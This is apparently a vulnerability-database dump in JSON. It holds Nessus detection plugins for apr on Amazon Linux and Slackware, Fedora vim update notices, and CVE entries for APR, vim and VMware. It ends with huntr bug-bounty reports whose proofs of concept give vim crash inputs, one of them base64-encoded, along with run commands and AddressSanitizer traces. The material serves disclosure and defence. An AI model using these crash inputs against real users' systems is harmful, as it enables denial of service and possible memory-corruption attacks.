audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar alas_release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(alas_release) || !strlen(alas_release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:alas_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'apr-1.7.2-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-1.7.2-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-1.7.2-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-debuginfo-1.7.2-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-debuginfo-1.7.2-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-debuginfo-1.7.2-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-devel-1.7.2-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-devel-1.7.2-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'apr-devel-1.7.2-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apr / apr-debuginfo / apr-devel\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-22T13:01:02", "description": "The version of apr installed on the remote host is prior to 1.7.2. It is, therefore, affected by multiple vulnerabilities as referenced in the SSA:2023-032-01 advisory.\n\n - When apr_time_exp*() or apr_os_exp_time*() functions are invoked with an invalid month field value in Apache Portable Runtime APR 1.6.2 and prior, out of bounds memory may be accessed in converting this value to an apr_time_exp_t value, potentially revealing the contents of a different static heap value or resulting in program termination, and may represent an information disclosure or denial of service vulnerability to applications which call these APR functions with unvalidated external input.\n (CVE-2017-12613)\n\n - An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue. (CVE-2021-35940)\n\n - Integer Overflow or Wraparound vulnerability in apr_encode functions of Apache Portable Runtime (APR) allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime (APR) version 1.7.0. (CVE-2022-24963)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-02-01T00:00:00", "type": "nessus", "title": "Slackware Linux 15.0 / current apr Multiple Vulnerabilities (SSA:2023-032-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940", "CVE-2022-24963"], "modified": "2023-02-08T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:apr", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:15.0"], "id": "SLACKWARE_SSA_2023-032-01.NASL", "href": "https://www.tenable.com/plugins/nessus/170930", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Slackware Security Advisory SSA:2023-032-01. The text\n# itself is copyright (C) Slackware Linux, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(170930);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/08\");\n\n script_cve_id(\"CVE-2017-12613\", \"CVE-2021-35940\", \"CVE-2022-24963\");\n\n script_name(english:\"Slackware Linux 15.0 / current apr Multiple Vulnerabilities (SSA:2023-032-01)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Slackware Linux host is missing a security update to apr.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of apr installed on the remote host is prior to 1.7.2. It is, therefore, affected by multiple\nvulnerabilities as referenced in the SSA:2023-032-01 advisory.\n\n - When apr_time_exp*() or apr_os_exp_time*() functions are invoked with an invalid month field value in\n Apache Portable Runtime APR 1.6.2 and prior, out of bounds memory may be accessed in converting this value\n to an apr_time_exp_t value, potentially revealing the contents of a different static heap value or\n resulting in program termination, and may represent an information disclosure or denial of service\n vulnerability to applications which call these APR functions with unvalidated external input.\n (CVE-2017-12613)\n\n - An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime\n 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch,\n and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue. (CVE-2021-35940)\n\n - Integer Overflow or Wraparound vulnerability in apr_encode functions of Apache Portable Runtime (APR)\n allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime (APR)\n version 1.7.0. (CVE-2022-24963)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected apr package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-35940\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-24963\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/02/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:15.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Slackware Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\ninclude(\"slackware.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\nvar flag = 0;\nvar constraints = [\n { 'fixed_version' : '1.7.2', 'product' : 'apr', 'os_name' : 'Slackware Linux', 'os_version' : '15.0', 'service_pack' : '1_slack15.0', 'arch' : 'i586' },\n { 'fixed_version' : '1.7.2', 'product' : 'apr', 'os_name' : 'Slackware Linux', 'os_version' : '15.0', 'service_pack' : '1_slack15.0', 'arch' : 'x86_64' },\n { 'fixed_version' : '1.7.2', 'product' : 'apr', 'os_name' : 'Slackware Linux', 'os_version' : 'current', 'service_pack' : '1', 'arch' : 'i586' },\n { 'fixed_version' : '1.7.2', 'product' : 'apr', 'os_name' : 'Slackware Linux', 'os_version' : 'current', 'service_pack' : '1', 'arch' : 'x86_64' }\n];\n\nforeach constraint (constraints) {\n var pkg_arch = constraint['arch'];\n var arch = NULL;\n if (pkg_arch == \"x86_64\") {\n arch = pkg_arch;\n }\n if (slackware_check(osver:constraint['os_version'],\n arch:arch,\n pkgname:constraint['product'],\n pkgver:constraint['fixed_version'],\n pkgarch:pkg_arch,\n pkgnum:constraint['service_pack'])) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : slackware_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2023-11-28T01:34:27", "description": "VIM (VIsual editor iMproved) is an updated and improved version of the vi editor. Vi was the first real screen-based editor for UNIX, and is still very popular. VIM improves on vi by adding new features: multiple windows, multi-level undo, block highlighting and more. ", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.3}, "published": "2021-10-23T03:25:44", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: vim-8.2.3512-1.fc33", "bulletinFamily": "unix", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3778", "CVE-2021-3796", "CVE-2021-3872", "CVE-2021-3875"], "modified": "2021-10-23T03:25:44", "id": "FEDORA:B14C530A6A1B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/S42L4Z4DTW4LHLQ4FJ33VEOXRCBE7WN4/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T01:34:27", "description": "VIM (VIsual editor iMproved) is an updated and improved version of the vi editor. Vi was the first real screen-based editor for UNIX, and is still very popular. VIM improves on vi by adding new features: multiple windows, multi-level undo, block highlighting and more. ", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.3}, "published": "2021-10-29T23:26:46", "type": "fedora", "title": "[SECURITY] Fedora 35 Update: vim-8.2.3512-1.fc35", "bulletinFamily": "unix", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3778", "CVE-2021-3796", "CVE-2021-3872", "CVE-2021-3875"], "modified": "2021-10-29T23:26:46", "id": "FEDORA:4863E3093F4C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/7K4JJBIH3OQSZRVTWKCJCDLGMFGQ5DOH/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-11-28T16:04:26", "description": "An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-08-23T10:15:07", "type": "cve", "title": "CVE-2021-35940", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.2, "vectorString": "AV:L/AC:L/Au:S/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940"], "modified": "2023-11-07T03:36:39", "cpe": ["cpe:/a:apache:portable_runtime:1.7.0"], "id": "CVE-2021-35940", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35940", "cvss": {"score": 3.2, "vector": "AV:L/AC:L/Au:S/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:apache:portable_runtime:1.7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-11-28T16:11:12", "description": "vim is vulnerable to Heap-based Buffer Overflow", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.9}, "published": "2021-10-19T13:15:11", "type": "cve", "title": "CVE-2021-3872", "cwe": ["CWE-122", "CWE-787"], "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3872"], "modified": "2023-11-07T03:38:19", "cpe": [], "id": "CVE-2021-3872", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3872", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T16:10:59", "description": "vim is vulnerable to Heap-based Buffer Overflow", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.9}, "published": "2021-10-15T14:15:07", "type": "cve", "title": "CVE-2021-3875", "cwe": ["CWE-122", "CWE-787"], "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3875"], "modified": "2023-11-07T03:38:20", "cpe": [], "id": "CVE-2021-3875", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3875", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": []}, {"lastseen": "2023-11-27T17:16:39", "description": "VMware Cloud Director Appliance contains an authentication bypass vulnerability in case VMware Cloud Director Appliance was upgraded to 10.5 from\nan older version.\u00a0On an upgraded version of VMware Cloud Director Appliance 10.5, a malicious actor with network access to the appliance can bypass login\nrestrictions when authenticating on port 22 (ssh) or port 5480 (appliance management console) . This bypass is not present on port 443 (VCD provider\nand tenant login). On a new installation of VMware Cloud Director Appliance 10.5, the bypass is not present.\u00a0VMware Cloud Director Appliance is impacted since it uses an affected version of sssd from the underlying Photon OS. The sssd issue is no longer present in versions of Photon OS that ship with sssd-2.8.1-11 or higher (Photon OS 3) or sssd-2.8.2-9 or higher (Photon OS 4 and 5).", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-11-14T21:15:09", "type": "cve", "title": "CVE-2023-34060", "cwe": ["CWE-306"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-34060"], "modified": "2023-11-21T19:59:44", "cpe": [], "id": "CVE-2023-34060", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-34060", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "huntr": [{"lastseen": "2023-10-31T17:09:25", "description": "# Description\nWhilst testing vim built from `commit be01090` with Clang 12 + ASan on Ubuntu 18.04, we discovered crafted input which triggers a bug in how vim draws information on the screen, causing a heap-buffer-overflow, WRITE of size 5 to occur. \n\n # Proof of Concept\nThe disclosed POC is trimmed down as small as we could make it and still trigger the bug. Thank you. \n\nFirst...\n```\ngit clone https://github.com/vim/vim\n\nLD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS=\"-fsanitize=address\" CXXFLAGS=\"-fsanitize=address\" LDFLAGS=\"-ldl -fsanitize=address\" ./configure --with-features=huge --enable-gui=none\n\nmake\n```\nSecond...\n```\necho \"ZggwMDAwMDAwMDAwMDAwMDAwMDAwMDAwCmYIMH8wMDAwMDAlJSUlJSUlJSUlJTAwMDAwMPz//wpl\nJSUlJSUlJSUlJSUlJSUKdnMKdjD/MG8=\" | base64 -d > /tmp/crash0000.fuzz\n```\n\nThen...\n```\nvim -u NONE -X -Z -e -s -S /tmp/crash0000.fuzz -c :qa!\n```\n\nFinally...\n```\n==1650480==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100000c500 at pc 0x00 000043beca bp 0x7ffd6c97a1b0 sp 0x7ffd6c979978\nWRITE of size 5 at 0x62100000c500 thread T0\n #0 0x43bec9 in __asan_memcpy (/root/vim/src/vim+0x43bec9)\n #1 0x61259e in win_redr_status /root/vim/src/drawscreen.c:488:6\n #2 0x630463 in redraw_statuslines /root/vim/src/drawscreen.c:3230:6\n #3 0x14d46b5 in main_loop /root/vim/src/main.c:1396:6\n #4 0x806356 in do_exedit /root/vim/src/ex_docmd.c:6903:3\n #5 0x7ab70f in ex_open /root/vim/src/ex_docmd.c:6838:5\n #6 0x7cc6cc in do_one_cmd /root/vim/src/ex_docmd.c:2611:2\n #7 0x7cc6cc in do_cmdline /root/vim/src/ex_docmd.c:1000:17\n #8 0x78e706 in global_exe_one /root/vim/src/ex_cmds.c\n #9 0x78e706 in global_exe /root/vim/src/ex_cmds.c:5030:2\n #10 0x78d8f7 in ex_global /root/vim/src/ex_cmds.c:4991:6\n #11 0x7cc6cc in do_one_cmd /root/vim/src/ex_docmd.c:2611:2\n #12 0x7cc6cc in do_cmdline /root/vim/src/ex_docmd.c:1000:17\n #13 0xed4fba in do_source /root/vim/src/scriptfile.c:1406:5\n #14 0xee2d93 in cmd_source /root/vim/src/scriptfile.c:971:14\n #15 0xee2d93 in ex_source /root/vim/src/scriptfile.c:997:2\n #16 0x7cc6cc in do_one_cmd /root/vim/src/ex_docmd.c:2611:2\n #17 0x7cc6cc in do_cmdline /root/vim/src/ex_docmd.c:1000:17\n #18 0x14cd685 in do_cmdline_cmd /root/vim/src/ex_docmd.c:594:12\n #19 0x14cd685 in exe_commands /root/vim/src/main.c:3081:2\n #20 0x14cd685 in vim_main2 /root/vim/src/main.c:773:2\n #21 0x14c6426 in main /root/vim/src/main.c:425:12\n #22 0x7fcb01979564 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x28564)\n #23 0x3c180d in _start (/root/vim/src/vim+0x3c180d)\n\n0x62100000c500 is located 0 bytes to the right of 4096-byte region [0x62100000b500,0x62100000 c500)\nallocated by thread T0 here:\n #0 0x43ca6d in malloc (/root/vim/src/vim+0x43ca6d)\n #1 0x47135d in lalloc /root/vim/src/alloc.c:244:11\n\nSUMMARY: AddressSanitizer: heap-buffer-overflow (/root/vim/src/vim+0x43bec9) in __asan_memcpy\n```\n# Impact\nForcefully exiting vim, software crash, etc.\n\nBuffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. Besides important user data, heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker's code. Even in applications that do not explicitly use function pointers, the run-time will usually leave many in memory. For example, object methods in C++ are generally implemented using function pointers. Even in C programs, there is often a global offset table used by the underlying runtime. When the consequence is arbitrary code execution, this can often be used to subvert any other security service.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-07T16:51:04", "type": "huntr", "title": "Heap-based Buffer Overflow in vim/vim", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3872"], "modified": "2021-10-08T17:44:40", "id": "C958013B-1C09-4939-92CA-92F50AA169E8", "href": "https://www.huntr.dev/bounties/c958013b-1c09-4939-92ca-92f50aa169e8/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-31T17:09:25", "description": "When fuzzing vim commit `56858e4ed` (works with latest build) with clang 12 and ASan, I discovered a heap buffer overflow.\n\n# Proof of Concept\n\nHere is minimized poc\n```sh\n/\\%.v\n5/\nc\n```\n\nExtract then run crafted file with this command\n`vim -u NONE -X -Z -e -s -S vimpoc1 -c :qa!`\n\n\nASan stack trace:\n\n```bash\naldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S vimpoc1 -c :qa!\n=================================================================\n==2889370==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000013d00 at pc 0x00000049a4ef bp 0x7ffffffdbf30 sp 0x7ffffffdb6f8\nREAD of size 4 at 0x621000013d00 thread T0\n #0 0x49a4ee in __asan_memmove (/home/aldo/vim/src/vim+0x49a4ee)\n #1 0x4d02e0 in vim_memsave /home/aldo/vim/src/alloc.c:597:2\n #2 0x75c5f58 in u_save_line /home/aldo/vim/src/undo.c:373:16\n #3 0x757d2c4 in u_saveline /home/aldo/vim/src/undo.c:3477:9\n #4 0x757a246 in u_save /home/aldo/vim/src/undo.c:257:2\n #5 0x43002fd in op_shift /home/aldo/vim/src/ops.c:145:9\n #6 0x22d91b1 in ex_operators /home/aldo/vim/src/ex_docmd.c:7743:6\n #7 0x209f37a in do_one_cmd /home/aldo/vim/src/ex_docmd.c:2611:2\n #8 0x201ebd1 in do_cmdline /home/aldo/vim/src/ex_docmd.c:1000:17\n #9 0x5c1b974 in do_source /home/aldo/vim/src/scriptfile.c:1406:5\n #10 0x5bffda5 in cmd_source /home/aldo/vim/src/scriptfile.c:971:14\n #11 0x5bfdd3f in ex_source /home/aldo/vim/src/scriptfile.c:997:2\n #12 0x209f37a in do_one_cmd /home/aldo/vim/src/ex_docmd.c:2611:2\n #13 0x201ebd1 in do_cmdline /home/aldo/vim/src/ex_docmd.c:1000:17\n #14 0x203af9a in do_cmdline_cmd /home/aldo/vim/src/ex_docmd.c:594:12\n #15 0x93c5f55 in exe_commands /home/aldo/vim/src/main.c:3081:2\n #16 0x93a0249 in vim_main2 /home/aldo/vim/src/main.c:773:2\n #17 0x932bfd4 in main /home/aldo/vim/src/main.c:425:12\n #18 0x7ffff78260b2 in __libc_start_main 